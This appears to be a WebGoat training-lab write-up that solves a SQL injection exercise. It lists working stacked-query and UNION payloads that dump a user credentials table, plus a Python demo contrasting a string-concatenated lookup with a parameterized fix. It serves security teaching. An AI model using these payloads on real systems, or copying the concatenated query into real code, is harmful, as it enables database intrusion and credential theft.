WebGoat is really clear on this exercise.

We can input a user name in the ‘Name’ text field and get some data back from the ‘user_data’ table, but what WebGoat is asking for is all the data (and Dave’s password) from the ‘user_system_data’ table, obtained by using a UNION query or by appending a second SQL query.
By inputting a single quote we can test whether the text field is vulnerable to SQLi.

The error tells us that the single quote breaks the SQL query, which means we can inject our own queries as follows:
a'; select * from user_system_data; --
This gets all of the ‘user_system_data’ table content by appending a second SQL query.
a' union select user_system_data.*,'1','1',1 from user_system_data; --
a' union select user_system_data.*,NULL,NULL,NULL from user_system_data; --
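Either of these two, or any other similar query, gets all of the ‘user_system_data’ table content by means of a UNION query. The three extra values pad the injected SELECT so that it returns the same number of columns as the original query, which a UNION requires.
If you need more help in understanding how SQLi works, the best place I can refer you to is PortSwigger Academy.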
We have obtained Dave’s password (plus all the data) from the ‘user_system_data’ table, as requested by the exercise.
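The single-quote test and the UNION query above, run against the kind of string-concatenated lookup that makes them work, next to the parameterized form that stops them. This is an added example, not WebGoat's code or part of the original write-up: the table columns, the sample rows and the function names are assumptions constructed for the demonstration, and SQLite stands in for WebGoat's database.

```python
import sqlite3

# UNION payload from the write-up. With the constructed schema below it selects
# 4 columns from user_system_data plus 3 NULLs to match user_data's 7 columns.
PAYLOAD = "a' union select user_system_data.*,NULL,NULL,NULL from user_system_data; --"

def build_db():
    """In-memory stand-in database; schema and rows are constructed for this example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user_data (userid INT, first_name TEXT, last_name TEXT,
            cc_number TEXT, cc_type TEXT, cookie TEXT, login_count INT);
        CREATE TABLE user_system_data (userid INT, user_name TEXT,
            password TEXT, cookie TEXT);
        INSERT INTO user_data VALUES (101, 'Joe', 'Snow', '0000', 'VISA', '', 0);
        INSERT INTO user_system_data VALUES (1, 'dave', 'constructed-secret', '');
    """)
    return db

def lookup_concatenated(db, name):
    """Vulnerable: the input is pasted into the SQL text and parsed as SQL."""
    sql = "SELECT * FROM user_data WHERE last_name = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, name):
    """Hardened: the input is bound as a value and never reaches the SQL parser."""
    return db.execute("SELECT * FROM user_data WHERE last_name = ?", (name,)).fetchall()

def outcome(lookup, db, name):
    """Return the rows, or the string 'sql error' when the statement fails to parse."""
    try:
        return lookup(db, name)
    except sqlite3.OperationalError:
        return "sql error"

if __name__ == "__main__":
    db = build_db()
    for label, value in [("normal", "Snow"), ("quote", "'"), ("union", PAYLOAD)]:
        print(label, "concatenated: ", outcome(lookup_concatenated, db, value))
        print(label, "parameterized:", outcome(lookup_parameterized, db, value))
```

The stacked-query variant is not shown because Python's sqlite3 execute() accepts only a single statement.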
This concludes WebGoat SQL injection advanced 3.
I hope you liked it.
PVXs